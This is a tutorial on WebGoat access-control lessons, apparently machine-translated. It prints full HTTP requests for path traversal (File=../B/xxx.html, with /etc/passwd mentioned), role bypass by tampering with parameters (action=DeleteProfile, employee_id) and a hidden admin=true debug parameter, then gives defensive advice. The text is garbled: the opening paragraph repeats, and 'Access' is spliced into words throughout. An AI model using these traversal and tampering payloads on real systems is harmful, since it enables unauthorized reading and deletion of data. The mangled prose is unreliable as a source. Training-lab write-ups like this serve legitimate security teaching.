WebGoat Learning Access Control defects (AccessControlFlaws)

In a role-based access control solution, a role represents a group of access permissions and privileges. A user can be assigned one or more roles. A role-based access control solution usually consists of two parts: Role permission management and role allocation. A compromised role-based access control scheme may allow the user to execute

In a role-based access control solution, a role represents a group of access permissions and privileges. A user can be assigned one or more roles. A role-based access control solution usually consists of two parts: Role permission management and role allocation. A compromised role-based access control scheme may allow the user to execute and not allow him/her

In a role-basedAccessControlIn the solution, roles represent a groupAccessPermissions and privileges. A user can be assigned one or more roles. A role-basedAccessControlThe solution consists of two parts: Role permission management and role allocation. A destroyed role-basedAccessControlThe scheme may allow a user to execute a role that does not allow him/her to be assigned, or allow privilege escalation to an unauthorized role in some wayAccess.

1. Bypass path-based Access ControlSolution

In a path-basedAccessControlIn this solution, attackers can traverse paths by providing relative path information. Therefore, attackers can use relative paths.AccessUsually no one can directlyAccessOr directly requested files that will be rejected.

For example, in A permission-based seller management system, each seller can only perform operations on his/her own order information and product information. Now there are seller A and seller B. The product information of A is stored under/webapps/A/, for example,/webapps/A/item1.html. A can use the product list InterfaceAccessThe server verifies the identity of A and returns the list of items in directory A to the client. A will send A message to the server when browsing its own productsAccessRequest:

POST http://localhost:8080/WebGoat/attack?Screen=57&menu=200 HTTP/1.1Host: localhost:8080Connection: keep-aliveContent-Length: 36Cache-Control: max-age=0Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Origin: http://localhost:8080User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31Content-Type: application/x-www-form-urlencodedReferer: http://localhost:8080/WebGoat/attack?Screen=57&menu=200Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DCFile=item1.html&SUBMIT=View+File

After receiving the request, the server receives item1.html in the directory A and returns the result to the client. Careless programmers did not re-verify the seller's permission to the directory when obtaining the product details.AccessHackers can exploit this negligence to spoof the server by modifying parameters. For example, modify the request parameters as follows:

POST http://localhost:8080/WebGoat/attack?Screen=57&menu=200 HTTP/1.1Host: localhost:8080Connection: keep-aliveContent-Length: 36Cache-Control: max-age=0Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Origin: http://localhost:8080User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31Content-Type: application/x-www-form-urlencodedReferer: http://localhost:8080/WebGoat/attack?Screen=57&menu=200Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DCFile=../B/xxx.html&SUBMIT=View+File

After receiving the request, the server verifies that user A is logged on and then sets the root directory to/webapps//Access../B/xxx.html, actualAccessThe seller B's product information/webapps/B/xxx.html is leaked to seller. More vulnerable systems may cause leakage of important information, such as setting the File parameter in the request to/etc/passwd or/etc/passwd, the system user information may be obtained, resulting in more serious losses.

2. Role-based Access Control

Many websites use role-based methods to strictly limit resources.AccessBut developers are prone to negligence when implementing such solutions. For example, for resource S, both Tom and John haveAccessPermission. John can modify and delete resource S relative to Tom. After the client Tom logs on to the system, the server returnsAccessAnd return the html page with only the view button:

After Jone logs on to the system, the server returns the html page with view and delete:

Click delete to send the following request to the server:

POST http://localhost:8080/WebGoat/attack?Screen=65&menu=200 HTTP/1.1Host: localhost:8080Connection: keep-aliveContent-Length: 36Cache-Control: max-age=0Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Origin: http://localhost:8080User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31Content-Type: application/x-www-form-urlencodedReferer: http://localhost:8080/WebGoat/attack?Screen=65&menu=200Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DCemployee_id=105&action=DeleteProfile　

After receiving the preceding request, the server executes the delete operation. When viewing resource S, tom sends the following request to the server:

POST http://localhost:8080/WebGoat/attack?Screen=65&menu=200 HTTP/1.1Host: localhost:8080Connection: keep-aliveContent-Length: 34Cache-Control: max-age=0Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Origin: http://localhost:8080User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31Content-Type: application/x-www-form-urlencodedReferer: http://localhost:8080/WebGoat/attack?Screen=65&menu=200Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DCemployee_id=105&action=ViewProfile　　

After tom knows the above information, he can try to modify his post parameter and change the post parameter string to employee_id = 105 & action = DeleteProfile and send it to the server. Careless programmers neglected to re-verify tom's permissions, causing tom to successfully execute john's delete permission. In the same way, tom modifies the url to perform the system administrator admin Operation, which threatens the server.

In the view request, tom can view detailed information about the relevant information.

From the above request parameters, we can see that the data id is represented by employee_id. If you try to modify employee_id = 101 to resend the request, the server will receive the following response:

The display layer is successfully bypassed.AccessLarry's documents.

To prevent the preceding operations, server services must strengthen the filtering and verification of Request Parameters and verify permissions. Do not trust the previous operations in each request, or trust all external input parameters, enhance verification, especially for sensitive operations such as payment, deletion, and price change. If multiple interfaces provide external services together, we can place the entire process in an ideal environment through the packaging of the presentation layer and the internal jump logic, however, as long as each interface is independent, hackers will exploit it to create unreasonable requests. Therefore, when designing the system, do not just consider what the normal situation is, but also consider exceptions (artificial) to handle the situation, it is necessary to perform strict parameter verification and permission verification in each step, and adhere to the untrusted principle.

3. Remote Management Access

Many website developers reserve related parameter interfaces in the script. Once this parameter is confirmed by the background programAccessThe permissions of the browser will be enlarged and cannot be viewed previously.AccessSuch as program debugging logs and hidden function menus. For example, you want to set a parameter admin = true for an interface so that developers can open debugging information or background data for debugging anywhere. For example, http: // localhost: 8080/WebGoat/attack? The Screen = 28 & menu = 2000 page only displays the user's identity information. If developers prefer to perform some debugging and modify the URL to http: // localhost: 8080/WebGoat/attack? Screen = 28 & menu = 2000 & admin = true. The server returns the details of all users, facilitating debugging on the Internet.

Debugging on the internet is convenient, but it is convenient for you and illegal personnel. There is no secret on the Internet. Once the password is obtained by someone else, the corresponding service can be attacked, this may cause unnecessary losses. In actual operations, make sure that the Internet Service disables the corresponding debugging function.